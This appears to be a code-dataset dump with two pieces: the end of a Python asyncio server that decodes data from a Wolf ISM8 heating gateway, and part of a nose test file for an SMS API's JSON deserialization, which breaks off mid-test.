92: ('BM3', 'Sparfaktor', 'DPT_Tempd', True, 'K'),
93: ('BM4', 'Stoerung', 'DPT_Switch', False, ''),
94: ('BM4', 'Raumtemperatur', 'DPT_Value_Temp', False, 'C'),
95: ('BM4', 'Warmwassersolltemperatur', 'DPT_Value_Temp', True, 'C'),
96: ('BM4', 'Programmwahl Mischer', 'DPT_HVACMode', True, ''),
97: ('BM4', 'Programmwahl Warmwasser', 'DPT_DHWMode', True, ''),
98: ('BM4', 'Mischer Zeitprogramm 1', 'DPT_Switch', True, ''),
99: ('BM4', 'Mischer Zeitprogramm 2', 'DPT_Switch', True, ''),
100: ('BM4', 'Mischer Zeitprogramm 3', 'DPT_Switch', True, ''),
101: ('BM4', 'Warmwasser Zeitprogramm 1', 'DPT_Switch', True, ''),
102: ('BM4', 'Warmwasser Zeitprogramm 2', 'DPT_Switch', True, ''),
103: ('BM4', 'Warmwasser Zeitprogramm 3', 'DPT_Switch', True, ''),
104: ('BM4', 'Sollwertkorrektur', 'DPT_Tempd', True, 'K'),
105: ('BM4', 'Sparfaktor', 'DPT_Tempd', True, 'K'),
106: ('KM', 'Stoerung', 'DPT_Switch', False, ''),
107: ('KM', 'Sammlertemperatur', 'DPT_Value_Temp', False, 'C'),
108: ('KM', 'Gesamtmodulationsgrad', 'DPT_Scaling', False, '%'),
109: ('KM', 'Vorlauftemperatur Mischer', 'DPT_Value_Temp', False, 'C'),
110: ('KM', 'Status Mischerkreispumpe', 'DPT_Switch', False, ''),
111: ('KM', 'Status Ausgang A1', 'DPT_Enable', False, ''),
112: ('KM', 'Eingang E1', 'DPT_Value_Temp', False, 'C'),
113: ('KM', 'Eingang E2', 'DPT_Value_Temp', False, 'C'),
114: ('MM1', 'Stoerung', 'DPT_Switch', False, ''),
115: ('MM1', 'Warmwassertemperatur', 'DPT_Value_Temp', False, 'C'),
116: (
'MM1', 'Vorlauftemperatur Mischer', 'DPT_Value_Temp', False, 'C'),
117: ('MM1', 'Status Mischerkreispumpe', 'DPT_Switch', False, ''),
118: ('MM1', 'Status Ausgang A1', 'DPT_Enable', False, ''),
119: ('MM1', 'Eingang E1', 'DPT_Value_Temp', False, 'C'),
120: ('MM1', 'Eingang E2', 'DPT_Value_Temp', False, 'C'),
121: ('MM2', 'Stoerung', 'DPT_Switch', False, ''),
122: ('MM2', 'Warmwassertemperatur', 'DPT_Value_Temp', False, 'C'),
123: (
'MM2', 'Vorlauftemperatur Mischer', 'DPT_Value_Temp', False, 'C'),
124: ('MM2', 'Status Mischerkreispumpe', 'DPT_Switch', False, ''),
125: ('MM2', 'Status Ausgang A1', 'DPT_Enable', False, ''),
126: ('MM2', 'Eingang E1', 'DPT_Value_Temp', False, 'C'),
127: ('MM2', 'Eingang E2', 'DPT_Value_Temp', False, 'C'),
128: ('MM3', 'Stoerung', 'DPT_Switch', False, ''),
129: ('MM3', 'Warmwassertemperatur', 'DPT_Value_Temp', False, 'C'),
130: (
'MM3', 'Vorlauftemperatur Mischer', 'DPT_Value_Temp', False, 'C'),
131: ('MM3', 'Status Mischerkreispumpe', 'DPT_Switch', False, ''),
132: ('MM3', 'Status Ausgang A1', 'DPT_Enable', False, ''),
133: ('MM3', 'Eingang E1', 'DPT_Value_Temp', False, 'C'),
134: ('MM3', 'Eingang E2', 'DPT_Value_Temp', False, 'C'),
135: ('SM', 'Stoerung', 'DPT_Switch', False, ''),
136: ('SM', 'Warmwassertemperatur Solar 1', 'DPT_Value_Temp', False,
'C'),
137: ('SM', 'Temperatur Kollektor 1', 'DPT_Value_Temp', False, 'C'),
138: ('SM', 'Eingang E1', 'DPT_Value_Temp', False, 'C'),
139: ('SM', 'Eingang E2 (Durchfluss)', 'DPT_Value_Volume_Flow', False,
'l/h'),
140: ('SM', 'Eingang E3', 'DPT_Value_Temp', False, 'C'),
141: ('SM', 'Status Solarkreispumpe SKP1', 'DPT_Switch', False, ''),
142: ('SM', 'Status Ausgang A1', 'DPT_Enable', False, ''),
143: ('SM', 'Status Ausgang A2', 'DPT_Enable', False, ''),
144: ('SM', 'Status Ausgang A3', 'DPT_Enable', False, ''),
145: ('SM', 'Status Ausgang A4', 'DPT_Enable', False, ''),
146: ('SM', 'Durchfluss', 'DPT_Value_Volume_Flow', False, 'l/h'),
147: ('SM', 'aktuelle Leistung', 'DPT_Power', False, 'kW'),
148: ('CWL', 'Stoerung', 'DPT_Switch', False, ''),
149: ('CWL', 'Programm', 'DPT_DHWMode', True, ''),
150: ('CWL', 'Zeitprogramm 1', 'DPT_Switch', True, ''),
151: ('CWL', 'Zeitprogramm 2', 'DPT_Switch', True, ''),
152: ('CWL', 'Zeitprogramm 3', 'DPT_Switch', True, ''),
153: ('CWL', 'Intensivlueftung AN_AUS', 'DPT_Switch', True, ''),
154: ('CWL', 'Intensivlueftung Startdatum', 'DPT_Date', True, ''),
155: ('CWL', 'Intensivlueftung Enddatum', 'DPT_Date', True, ''),
156: ('CWL', 'Intensivlueftung Startzeit', 'DPT_TimeOfDay', True, ''),
157: ('CWL', 'Intensivlueftung Endzeit', 'DPT_TimeOfDay', True, ''),
158: ('CWL', 'Zeitw. Feuchteschutz AN_AUS', 'DPT_Switch', True, ''),
159: ('CWL', 'Zeitw. Feuchteschutz Startdatum', 'DPT_Date', True, ''),
160: ('CWL', 'Zeitw. Feuchteschutz Enddatum', 'DPT_Date', True, ''),
161: (
'CWL', 'Zeitw. Feuchteschutz Startzeit', 'DPT_TimeOfDay', True,
''),
162: (
'CWL', 'Zeitw. Feuchteschutz Endzeit', 'DPT_TimeOfDay', True, ''),
163: ('CWL', 'Lueftungsstufe', 'DPT_Scaling', False, '%'),
164: ('CWL', 'Ablufttemperatur', 'DPT_Value_Temp', False, 'C'),
165: ('CWL', 'Frischlufttemperatur', 'DPT_Value_Temp', False, 'C'),
166: ('CWL', 'Durchsatz Zuluft', 'DPT_FlowRate_m3/h', False, 'ccm/h'),
167: ('CWL', 'Durchsatz Abluft', 'DPT_FlowRate_m3/h', False, 'ccm/h'),
168: ('CWL', 'Bypass Initialisierung', 'DPT_Bool', False, ''),
169: ('CWL', 'Bypass oeffnet_offen', 'DPT_Bool', False, ''),
170: ('CWL', 'Bypass schliesst_geschlossen', 'DPT_Bool', False, ''),
171: ('CWL', 'Bypass Fehler', 'DPT_Bool', False, ''),
172: ('CWL', 'Frost Status: Init_Warte', 'DPT_Bool', False, ''),
173: ('CWL', 'Frost Status: Kein Frost', 'DPT_Bool', False, ''),
174: ('CWL', 'Frost Status: Vorwaermer', 'DPT_Bool', False, ''),
175: ('CWL', 'Frost Status: Fehler', 'DPT_Bool', False, ''),
176: ('BWL', 'Stoerung', 'DPT_Switch', False, ''),
177: ('BWL', 'Betriebsart', 'DPT_HVACContrMode', False, ''),
178: ('BWL', 'Heizleistung', 'DPT_Power', False, 'W'),
179: ('BWL', 'Kuehlleistung', 'DPT_Power', False, 'W'),
180: ('BWL', 'Kesseltemperatur', 'DPT_Value_Temp', False, 'C'),
181: ('BWL', 'Sammlertemperatur', 'DPT_Value_Temp', False, 'C'),
182: ('BWL', 'Ruecklauftemperatur', 'DPT_Value_Temp', False, 'C'),
183: ('BWL', 'Warmwassertemperatur', 'DPT_Value_Temp', False, 'C'),
184: ('BWL', 'Aussentemperatur', 'DPT_Value_Temp', False, 'C'),
185: ('BWL', 'Status Heizkreispumpe', 'DPT_Switch', False, ''),
186: ('BWL', 'Status Aux-Pumpe', 'DPT_Switch', False, ''),
187: ('BWL', '3W-Umschaltventil HZ_WW', 'DPT_OpenClose', False, ''),
188: ('BWL', '3W-Umschaltventil HZ_K', 'DPT_OpenClose', False, ''),
189: ('BWL', 'Status E-Heizung', 'DPT_Switch', False, ''),
190: ('BWL', 'Anlagendruck', 'DPT_Value_Pres', False, 'Pa'),
191: ('BWL', 'Leistungsaufnahme', 'DPT_Power', False, 'W'),
192: ('CWL', 'Filterwarnung aktiv', 'DPT_Switch', False, '-'),
193: ('CWL', 'Filterwarnung zuruecksetzen', 'DPT_Switch', True, '-'),
194: ('BM1', '1x Warmwasserladung (gobal)', 'DPT_Switch', True, '-'),
195: ('SM', 'Tagesertrag', 'DPT_ActiveEnergy', False, 'Wh'),
196: ('SM', 'Gesamtertrag', 'DPT_ActiveEnergy_kWh', False, 'kWh'),
197: ('HG1', 'Abgastemperatur', 'DPT_Value_Temp', False, 'C'),
198: ('HG1', 'Leistungsvorgabe', 'DPT_Scaling', True, '%'),
199: ('HG1', 'Kesseltemperaturvorgabe', 'DPT_Value_Temp', True, 'C'),
200: ('HG2', 'Abgastemperatur', 'DPT_Value_Temp', False, 'C'),
201: ('HG2', 'Leistungsvorgabe', 'DPT_Scaling', True, '%'),
202: ('HG2', 'Kesseltemperaturvorgabe', 'DPT_Value_Temp', True, 'C'),
203: ('HG3', 'Abgastemperatur', 'DPT_Value_Temp', False, 'C'),
204: ('HG3', 'Leistungsvorgabe', 'DPT_Scaling', True, '%'),
205: ('HG3', 'Kesseltemperaturvorgabe', 'DPT_Value_Temp', True, 'C'),
206: ('HG4', 'Abgastemperatur', 'DPT_Value_Temp', False, 'C'),
207: ('HG4', 'Leistungsvorgabe', 'DPT_Scaling', True, '%'),
208: ('HG4', 'Kesseltemperaturvorgabe', 'DPT_Value_Temp', True, 'C'),
209: ('KM', 'Gesamtmodulationsgradvorgabe', 'DPT_Scaling', True, '%'),
210: ('KM', 'Sammlertemperaturvorgabe', 'DPT_Value_Temp', True, 'C')
}
@staticmethod
def get_device(dp_id):
""" returns sensor value from private array of sensor-readings """
if dp_id in Ism8.DATAPOINTS.keys():
return Ism8.DATAPOINTS[dp_id][Ism8.DP_DEVICE]
else:
return None
@staticmethod
def get_name(dp_id):
""" returns sensor value from private array of sensor-readings """
if dp_id in Ism8.DATAPOINTS.keys():
return Ism8.DATAPOINTS[dp_id][Ism8.DP_NAME]
else:
return None
@staticmethod
def get_type(dp_id):
""" returns sensor value from private array of sensor-readings """
if dp_id in Ism8.DATAPOINTS.keys():
return Ism8.DATAPOINTS[dp_id][Ism8.DP_TYPE]
else:
return None
@staticmethod
def get_unit(dp_id):
""" returns sensor value from private array of sensor-readings """
if dp_id in Ism8.DATAPOINTS.keys():
return Ism8.DATAPOINTS[dp_id][Ism8.DP_UNIT]
else:
return None
@staticmethod
def get_all_sensors():
""" returns pointer all possible values of ISM8 datapoints """
return Ism8.DATAPOINTS
def __init__(self):
self._dp_values = {}
# all the datapoint-values (IDs matching the list above) are stored
# here
self._transport = None
self._connected = False
self._LOGGER = logging.getLogger(__name__)
def factory(self):
"""
returns reference to itself for using in protocol_factory with
create_server
"""
return self
def connection_made(self, transport):
""" is called as soon as an ISM8 connects to server """
_peername = transport.get_extra_info('peername')
self._LOGGER.info("Connection from ISM8: %s", _peername)
self._transport = transport
self._connected = True
def data_received(self, data):
""" is called whenever data is ready """
_header_ptr = 0
msg_length = 0
self._LOGGER.debug('Raw data received: %s', data)
while _header_ptr < len(data):
_header_ptr = data.find(Ism8.ISM_HEADER, _header_ptr)
if _header_ptr >= 0:
if len(data[_header_ptr:]) >= 9:
# smallest processable data:
# hdr plus 5 bytes=>at least 9 bytes
msg_length = 256 * data[_header_ptr + 4] + data[
_header_ptr + 5]
# msg_length comes in bytes 4 and 5
else:
msg_length = len(data) + 1
# 2 possible outcomes here: Buffer is to short for message=>abort
# buffer is larger => than msg: process 1 message,
# then continue loop
if len(data) < _header_ptr + msg_length:
self._LOGGER.debug(
"Buffer shorter than expected / broken Message.")
self._LOGGER.debug("Discarding: %s ", data[_header_ptr:])
# setting Ptr to end of data will end loop
_header_ptr = len(data)
else:
# send ACK to ISM8 according to API: ISM Header,
# then msg-length(17), then ACK w/ 2 bytes from original msg
ack_msg = bytearray(Ism8.ISM_HEADER)
ack_msg.append(0x00)
ack_msg.append(0x11)
ack_msg.extend(Ism8.ISM_CONN_HEADER)
ack_msg.extend(Ism8.ISM_ACK)
ack_msg[12] = data[_header_ptr + 12]
ack_msg[13] = data[_header_ptr + 13]
self._LOGGER.debug('Sending ACK: %s ', ack_msg)
self._transport.write(ack_msg)
self.process_msg(
data[_header_ptr + 10:_header_ptr + msg_length])
# process message without header (first 10 bytes)
_header_ptr += msg_length
# prepare to get next message; advance Ptr to next Msg
def process_msg(self, msg):
"""
Processes received datagram(s) according to ISM8 API specification
into message length, command, values delivered
"""
max_dp = msg[4] * 256 + msg[5]
# number of DATAPOINTS are coded into bytes 4 and 5 of message
i = 0
# byte counter
dp_nbr = 1
# datapoint counter
while dp_nbr <= max_dp:
self._LOGGER.debug('DP {0:d} / {1:d} in datagram:'.format(
dp_nbr, max_dp))
dp_id = msg[i + 6] * 256 + msg[i + 7]
# dp_command = msg[i + 8]
# to be implemented for writing values to ISM8
dp_length = msg[i + 9]
dp_raw_value = bytearray(msg[i + 10:i + 10 + dp_length])
self._LOGGER.debug('Processing DP-ID %s, %s bytes: message: %s',
dp_id, dp_length, dp_raw_value)
self.decode_datapoint(dp_id, dp_length, dp_raw_value)
# now advance byte counter and datapoint counter
dp_nbr += 1
i = i + 10 + dp_length
def decode_datapoint(self, dp_id, length, raw_bytes):
"""
decodes a single value according to API;
receives raw bytes from network and
decodes them according to API data type
"""
result = 0
for single_byte in raw_bytes:
result = result * 256 + int(single_byte)
if dp_id not in Ism8.DATAPOINTS:
self._LOGGER.error("unknown datapoint: %s, data:%s",
dp_id, result)
return
dp_type = Ism8.DATAPOINTS[dp_id][Ism8.DP_TYPE]
if (length == 1) and dp_type in ("DPT_Switch",
"DPT_Bool",
"DPT_Enable",
"DPT_OpenClose"):
# take 1st bit and cast to Bool
self._dp_values.update({dp_id: bool(result & 1)})
elif (length == 1) and (dp_type == "DPT_HVACMode"):
# translate values to clear status-text
if result == 0:
self._dp_values.update({dp_id: 'Auto'})
elif result == 1:
self._dp_values.update({dp_id: 'Comfort'})
elif result == 2:
self._dp_values.update({dp_id: 'Standby'})
elif result == 3:
self._dp_values.update({dp_id: 'Economy'})
elif result == 4:
self._dp_values.update({dp_id: 'Building Protection'})
elif (length == 1) and (dp_type == "DPT_Scaling"):
# take byte value and multiply by 100/255
self._dp_values.update({dp_id: 100 / 255 * result})
elif (length == 1) and (dp_type == "DPT_DHWMode"):
if result == 0:
self._dp_values.update({dp_id: 'Auto'})
elif result == 1:
self._dp_values.update({dp_id: 'LegioProtect'})
elif result == 2:
self._dp_values.update({dp_id: 'Normal'})
elif result == 3:
self._dp_values.update({dp_id: 'Reduced'})
elif result == 4:
self._dp_values.update({dp_id: 'Off'})
elif (length == 1) and (dp_type == "DPT_HVACContrMode"):
# translate values to clear status-text
if result == 0:
self._dp_values.update({dp_id: 'Auto'})
elif result == 1:
self._dp_values.update({dp_id: 'Heat'})
elif result == 2:
self._dp_values.update({dp_id: 'Morning Warmup'})
elif result == 3:
self._dp_values.update({dp_id: 'Cool'})
elif result == 4:
self._dp_values.update({dp_id: 'Night Purge'})
elif result == 5:
self._dp_values.update({dp_id: 'Precool'})
elif result == 6:
self._dp_values.update({dp_id: 'Off'})
elif result == 7:
self._dp_values.update({dp_id: 'Test'})
elif result == 8:
self._dp_values.update({dp_id: 'Emergency Heat'})
elif result == 9:
self._dp_values.update({dp_id: 'Fan Only'})
elif result == 10:
self._dp_values.update({dp_id: 'Free Cool'})
elif result == 11:
self._dp_values.update({dp_id: 'Ice'})
elif result == 12:
self._dp_values.update({dp_id: 'Maximum Heating Mode'})
elif result == 13:
self._dp_values.update({dp_id: 'Economic Heat/Cool Mode'})
elif result == 14:
self._dp_values.update({dp_id: 'Dehumidification'})
elif result == 15:
self._dp_values.update({dp_id: 'Calibration Mode'})
elif result == 16:
self._dp_values.update({dp_id: 'Emergency Cool Mode'})
elif result == 17:
self._dp_values.update({dp_id: 'Emergency Steam Mode'})
elif result == 20:
self._dp_values.update({dp_id: 'NoDem'})
elif (length == 2) and (dp_type in ("DPT_Value_Temp",
"DPT_Value_Tempd",
"DPT_Tempd",
"DPT_Value_Pres",
"DPT_Power",
"DPT_Value_Volume_Flow"
)):
_sign = (result & 0b1000000000000000) >> 15
_exponent = (result & 0b0111100000000000) >> 11
_mantisse = result & 0b0000011111111111
self._LOGGER.debug(
'binary format {0:b} -> s:{1:b} , m:{2:b} , e:{3:b}'
.format(result, _sign, _mantisse, _exponent))
if _sign == 1:
_mantisse = -(~(_mantisse - 1) & 0x07ff)
self._dp_values.update(
{dp_id: (0.01 * (2 ** _exponent) * _mantisse)})
elif (length == 4) and (dp_type in ("DPT_ActiveEnergy",
"DPT_ActiveEnergy_kWh"
)):
self._dp_values.update({dp_id: result})
else:
self._LOGGER.error('datatype not implemented: %s ', dp_type)
return
if dp_id in self._dp_values.keys():
self._LOGGER.debug('decoded DP %s : %s = %s\n',
dp_id, Ism8.DATAPOINTS[dp_id],
self._dp_values[dp_id])
else:
self._LOGGER.error('could not decode DP %s : %s\n',
dp_id, Ism8.DATAPOINTS[dp_id])
def connection_lost(self, exc):
"""
Is called when connection ends. closes socket.
"""
self._LOGGER.debug('ISM8 closed the connection.Stopping')
self._connected = False
self._transport.close()
def read(self, dp_id):
"""
Returns sensor value from private array of sensor-readings
"""
if dp_id in self._dp_values.keys():
return self._dp_values[dp_id]
else:
return None
if __name__ == "__main__":
_LOGGER = logging.getLogger(__name__)
logging.basicConfig()
_LOGGER.setLevel(logging.DEBUG)
# for testing purposes only, relies on debug output
myProtocol = Ism8()
for keys, values in myProtocol.get_all_sensors().items():
print("%s: %s\n" % (keys, values))
_eventloop = asyncio.get_event_loop()
coro = _eventloop.create_server(myProtocol.factory, '', 12004)
_server = _eventloop.run_until_complete(coro)
# Serve requests until Ctrl+C is pressed
_LOGGER.debug('Waiting for ISM8 connection on %s',
_server.sockets[0].getsockname())
_eventloop.run_forever()
| 238 | 0 | 29 |
7c11d04529484bac5ffcaf0ec1b0a0573a4a23f4 | 18,027 | py | Python | tests/deserialize_test.py | linhuiwzqu/clxcommunications | 5f5fe593402fdb014c17fa5ef200ee9b39d42caf | [
"Apache-2.0"
] | 3 | 2018-01-23T14:18:25.000Z | 2019-02-12T07:35:37.000Z | tests/deserialize_test.py | linhuiwzqu/clxcommunications | 5f5fe593402fdb014c17fa5ef200ee9b39d42caf | [
"Apache-2.0"
] | 3 | 2017-01-20T08:23:05.000Z | 2017-01-20T10:38:10.000Z | tests/deserialize_test.py | linhuiwzqu/clxcommunications | 5f5fe593402fdb014c17fa5ef200ee9b39d42caf | [
"Apache-2.0"
] | 2 | 2019-03-07T18:33:52.000Z | 2021-06-24T01:23:03.000Z | # -*- coding: utf-8 -*-
# pylint: disable=missing-docstring
# pylint: disable=wildcard-import
# pylint: disable=unused-wildcard-import
# pylint: disable=invalid-name
from datetime import datetime
import json
from clx.xms import api, exceptions, deserialize
from nose.tools import *
from iso8601 import UTC
@raises(exceptions.UnexpectedResponseException)
@raises(exceptions.UnexpectedResponseException)
@raises(exceptions.UnexpectedResponseException)
@raises(exceptions.UnexpectedResponseException)
@raises(exceptions.UnexpectedResponseException)
@raises(exceptions.UnexpectedResponseException)
| 31.626316 | 287 | 0.552283 | # -*- coding: utf-8 -*-
# pylint: disable=missing-docstring
# pylint: disable=wildcard-import
# pylint: disable=unused-wildcard-import
# pylint: disable=invalid-name
from datetime import datetime
import json
from clx.xms import api, exceptions, deserialize
from nose.tools import *
from iso8601 import UTC
class MockResponse(object):
def __init__(self, text):
self.text = text
def json(self):
return json.loads(self.text)
@raises(exceptions.UnexpectedResponseException)
def test_read_invalid_json():
class BadMockResponse(MockResponse):
def __init__(self):
MockResponse.__init__(self, '{this is invalid JSON}')
def json(self):
raise ValueError('Bad JSON')
deserialize.batch_result(BadMockResponse())
def test_read_batch_response_text():
response = MockResponse(
"""{
"body": "${foo}${bar}",
"canceled": true,
"parameters": {
"foo": {
"123456789": "Joe",
"987654321": "Mary",
"default": "you"
},
"bar": {}
},
"created_at": "2016-12-01T11:03:13.192Z",
"delivery_report": "none",
"send_at": "2016-12-02T11:03:13.192Z",
"expire_at": "2016-12-05T11:03:13.192Z",
"from": "12345",
"id": "3SD49KIOW8lL1Z5E",
"modified_at": "2016-12-01T11:03:13Z",
"to": [
"987654321",
"555555555"
],
"callback_url": "https://example.com/callbacker",
"type": "mt_text"
}""")
result = deserialize.batch_result(response)
assert_is_instance(result, api.MtBatchTextSmsResult)
assert_equal('${foo}${bar}', result.body)
assert_true(result.canceled)
assert_equal(
datetime(2016, 12, 1, 11, 3, 13, 192000, UTC), result.created_at
)
assert_equal('none', result.delivery_report)
assert_equal(
datetime(2016, 12, 2, 11, 3, 13, 192000, UTC), result.send_at
)
assert_equal(
datetime(2016, 12, 5, 11, 3, 13, 192000, UTC), result.expire_at
)
assert_equal('12345', result.sender)
assert_equal('3SD49KIOW8lL1Z5E', result.batch_id)
assert_equal(
datetime(2016, 12, 1, 11, 3, 13, 0, UTC), result.modified_at
)
assert_equal(
'https://example.com/callbacker', result.callback_url
)
assert_equal(
{'987654321', '555555555'}, result.recipients
)
assert_equal(
{
'foo': {
'default': 'you',
'987654321': 'Mary',
'123456789': 'Joe'
},
'bar': {}
},
result.parameters
)
@raises(exceptions.UnexpectedResponseException)
def test_read_batch_response_unknown():
response = MockResponse(
"""{
"some_field": "some_value",
"type": "mt_what"
}""")
deserialize.batch_result(response)
def test_read_batches_page():
response = MockResponse(
"""
{
"batches": [
{
"body": "AAECAw==",
"canceled": false,
"created_at": "2016-12-14T08:15:29.969Z",
"delivery_report": "none",
"expire_at": "2016-12-17T08:15:29.969Z",
"from": "12345",
"id": "5Z8QsIRsk86f-jHB",
"modified_at": "2016-12-14T08:15:29.969Z",
"tags": [
"rah"
],
"to": [
"987654321",
"123456789"
],
"type": "mt_binary",
"udh": "fffefd"
},
{
"body": "Hello, world!",
"canceled": false,
"created_at": "2016-12-09T12:54:28.247Z",
"delivery_report": "none",
"expire_at": "2016-12-12T12:54:28.247Z",
"from": "12345",
"id": "4nQCc1T6Dg-R-zHX",
"modified_at": "2016-12-09T12:54:28.247Z",
"tags": [
"rah"
],
"to": [
"987654321"
],
"type": "mt_text"
},
{
"body": "Hello",
"canceled": false,
"created_at": "2016-12-06T11:14:37.438Z",
"delivery_report": "none",
"expire_at": "2016-12-09T11:14:37.438Z",
"from": "12345",
"id": "4G4OmwztSJbVL2bl",
"modified_at": "2016-12-06T11:14:37.438Z",
"tags": [
"rah1",
"rah2"
],
"to": [
"987654321",
"555555555"
],
"type": "mt_text"
}
],
"count": 7,
"page": 0,
"page_size": 3
}
""")
result = deserialize.batches_page(response)
assert_equal(3, result.size)
assert_equal(0, result.page)
assert_equal(7, result.total_size)
assert_equal(3, len(result.content))
assert_is_instance(result.content[0], api.MtBatchBinarySmsResult)
assert_is_instance(result.content[1], api.MtBatchTextSmsResult)
assert_is_instance(result.content[2], api.MtBatchTextSmsResult)
assert_equal('5Z8QsIRsk86f-jHB', result.content[0].batch_id)
assert_equal('4nQCc1T6Dg-R-zHX', result.content[1].batch_id)
assert_equal('4G4OmwztSJbVL2bl', result.content[2].batch_id)
def test_read_delivery_report_summary():
response = MockResponse(
"""
{
"batch_id": "3SD49KIOW8lL1Z5E",
"statuses": [
{
"code": 0,
"count": 2,
"status": "Delivered"
},
{
"code": 11,
"count": 1,
"status": "Failed"
}
],
"total_message_count": 2,
"type": "delivery_report_sms"
}
""")
result = deserialize.batch_delivery_report(response)
assert_equal('3SD49KIOW8lL1Z5E', result.batch_id)
assert_equal(2, result.total_message_count)
assert_equal(2, len(result.statuses))
assert_equal(0, result.statuses[0].code)
assert_equal(11, result.statuses[1].code)
assert_equal('Delivered', result.statuses[0].status)
assert_equal('Failed', result.statuses[1].status)
assert_equal(2, result.statuses[0].count)
assert_equal(1, result.statuses[1].count)
assert_equal(set(), result.statuses[0].recipients)
assert_equal(set(), result.statuses[1].recipients)
def test_read_delivery_report_full():
response = MockResponse(
"""{
"type" : "delivery_report_sms",
"batch_id" : "4G4OmwztSJbVL2bl",
"total_message_count" : 2,
"statuses" : [ {
"code" : 0,
"status" : "Delivered",
"count" : 1,
"recipients" : [ "555555555" ]
}, {
"code" : 11,
"status" : "Failed",
"count" : 1,
"recipients" : [ "987654321" ]
} ]
}""")
result = deserialize.batch_delivery_report(response)
assert_equal('4G4OmwztSJbVL2bl', result.batch_id)
assert_equal(2, result.total_message_count)
assert_equal(2, len(result.statuses))
assert_equal(0, result.statuses[0].code)
assert_equal(11, result.statuses[1].code)
assert_equal('Delivered', result.statuses[0].status)
assert_equal('Failed', result.statuses[1].status)
assert_equal(1, result.statuses[0].count)
assert_equal(1, result.statuses[1].count)
assert_equal({'555555555'}, result.statuses[0].recipients)
assert_equal({'987654321'}, result.statuses[1].recipients)
@raises(exceptions.UnexpectedResponseException)
def test_read_delivery_report_unknown_type():
response = MockResponse('{ "hello" : "value" }')
deserialize.batch_delivery_report(response)
def test_read_recipient_delivery_report():
response = MockResponse('{"recipient":"123456789","code":11,"status":"Failed","at":"2016-12-05T16:24:23.318Z","type":"recipient_delivery_report_sms","batch_id":"3-mbA7z9wDKY76ag","operator_status_at":"2016-12-05T16:24:00.000Z","status_message":"mystatusmessage","operator":"31101"}')
result = deserialize.batch_recipient_delivery_report(response)
assert_equal('3-mbA7z9wDKY76ag', result.batch_id)
assert_equal(
datetime(2016, 12, 5, 16, 24, 0, 0, UTC), result.operator_status_at
)
assert_equal(
datetime(2016, 12, 5, 16, 24, 23, 318000, UTC), result.status_at
)
assert_equal(api.DeliveryStatus.FAILED, result.status)
assert_equal(11, result.code)
assert_equal('123456789', result.recipient)
assert_equal('mystatusmessage', result.status_message)
assert_equal('31101', result.operator)
@raises(exceptions.UnexpectedResponseException)
def test_read_recipient_delivery_report_unknown_type():
response = MockResponse('{ "hello" : "value" }')
deserialize.batch_recipient_delivery_report(response)
def test_read_group_result():
response = MockResponse(
"""{
"auto_update": {
"to": "12345",
"add": {
"first_word": "hello",
"second_word": "world"
},
"remove": {
"first_word": "goodbye",
"second_word": "world"
}
},
"child_groups": [],
"created_at": "2016-12-08T12:38:19.962Z",
"id": "4cldmgEdAcBfcHW3",
"modified_at": "2016-12-10T12:38:19.162Z",
"name": "rah-test",
"size": 1
}""")
result = deserialize.group_result(response)
assert_equal('12345', result.auto_update.recipient)
assert_equal(('hello', 'world'), result.auto_update.add_word_pair)
assert_equal(('goodbye', 'world'), result.auto_update.remove_word_pair)
assert_equal(0, len(result.child_groups))
assert_equal(
datetime(2016, 12, 8, 12, 38, 19, 962000, UTC), result.created_at
)
assert_equal('4cldmgEdAcBfcHW3', result.group_id)
assert_equal(
datetime(2016, 12, 10, 12, 38, 19, 162000, UTC), result.modified_at
)
assert_equal('rah-test', result.name)
assert_equal(1, result.size)
def test_read_groups_page():
response = MockResponse(
"""
{
"count": 8,
"page": 2,
"groups": [
{
"id": "4cldmgEdAcBfcHW3",
"name": "rah-test",
"size": 1,
"created_at": "2016-12-08T12:38:19.962Z",
"modified_at": "2016-12-08T12:38:19.962Z",
"child_groups": [],
"auto_update": {
"to": "12345"
}
}
],
"page_size": 1
}
""")
result = deserialize.groups_page(response)
assert_equal(1, result.size)
assert_equal(2, result.page)
assert_equal(8, result.total_size)
assert_equal(1, len(result.content))
assert_is_instance(result.content[0], api.GroupResult)
assert_equal('4cldmgEdAcBfcHW3', result.content[0].group_id)
def test_read_group_members():
response = MockResponse('["123456789", "987654321"]')
result = deserialize.group_members(response)
assert_equal({'123456789', '987654321'}, result)
def test_read_tags():
response = MockResponse('{ "tags": ["tag1", "ัะฐะณ2"] }')
result = deserialize.tags(response)
assert_equal({'tag1', u'ัะฐะณ2'}, result)
def test_read_error():
response = MockResponse(
"""
{
"code": "yes_this_is_code",
"text": "This is a text"
}
""")
result = deserialize.error(response)
assert_equal('yes_this_is_code', result.code)
assert_equal('This is a text', result.text)
def test_dry_run_with_per_recipients():
response = MockResponse(
"""
{"number_of_recipients":2,"number_of_messages":2,"per_recipient":[{"recipient":"987654321","body":"Hello","number_of_parts":1,"encoding":"text"},{"recipient":"555555555","body":"Hello","number_of_parts":1,"encoding":"text"}]}
""")
result = deserialize.batch_dry_run_result(response)
assert_equal(2, result.number_of_recipients)
assert_equal(2, result.number_of_messages)
assert_equal('Hello', result.per_recipient[0].body)
assert_equal(
api.DryRunPerRecipient.ENCODING_TEXT, result.per_recipient[0].encoding
)
assert_equal('555555555', result.per_recipient[1].recipient)
assert_equal(1, result.per_recipient[1].number_of_parts)
def test_dry_run_without_per_recipients():
response = MockResponse('{"number_of_recipients":2,"number_of_messages":2}')
result = deserialize.batch_dry_run_result(response)
assert_equal(2, result.number_of_recipients)
assert_equal(2, result.number_of_messages)
def test_mo_binary_sms():
response = MockResponse(
"""
{
"type": "mo_binary",
"to": "54321",
"from": "123456789",
"id": "b88b4cee-168f-4721-bbf9-cd748dd93b60",
"sent_at": "2016-12-03T16:24:23.318Z",
"received_at": "2016-12-05T16:24:23.318Z",
"body": "AwE=",
"udh": "00010203",
"operator": "48271"
}
""")
result = deserialize.mo_sms(response)
assert_is_instance(result, api.MoBinarySms)
assert_equal('54321', result.recipient)
assert_equal('123456789', result.sender)
assert_equal('b88b4cee-168f-4721-bbf9-cd748dd93b60', result.message_id)
assert_equal(b'\x03\x01', result.body)
assert_equal(b'\x00\x01\x02\x03', result.udh)
assert_equal(
datetime(2016, 12, 3, 16, 24, 23, 318000, UTC), result.sent_at
)
assert_equal(
datetime(2016, 12, 5, 16, 24, 23, 318000, UTC), result.received_at
)
assert_equal('48271', result.operator)
def test_mo_text_sms():
response = MockResponse(
"""
{
"type": "mo_text",
"to": "12345",
"from": "987654321",
"id": "b88b4cee-168f-4721-bbf9-cd748dd93b60",
"sent_at": "2016-12-03T16:24:23.318Z",
"received_at": "2016-12-05T16:24:23.318Z",
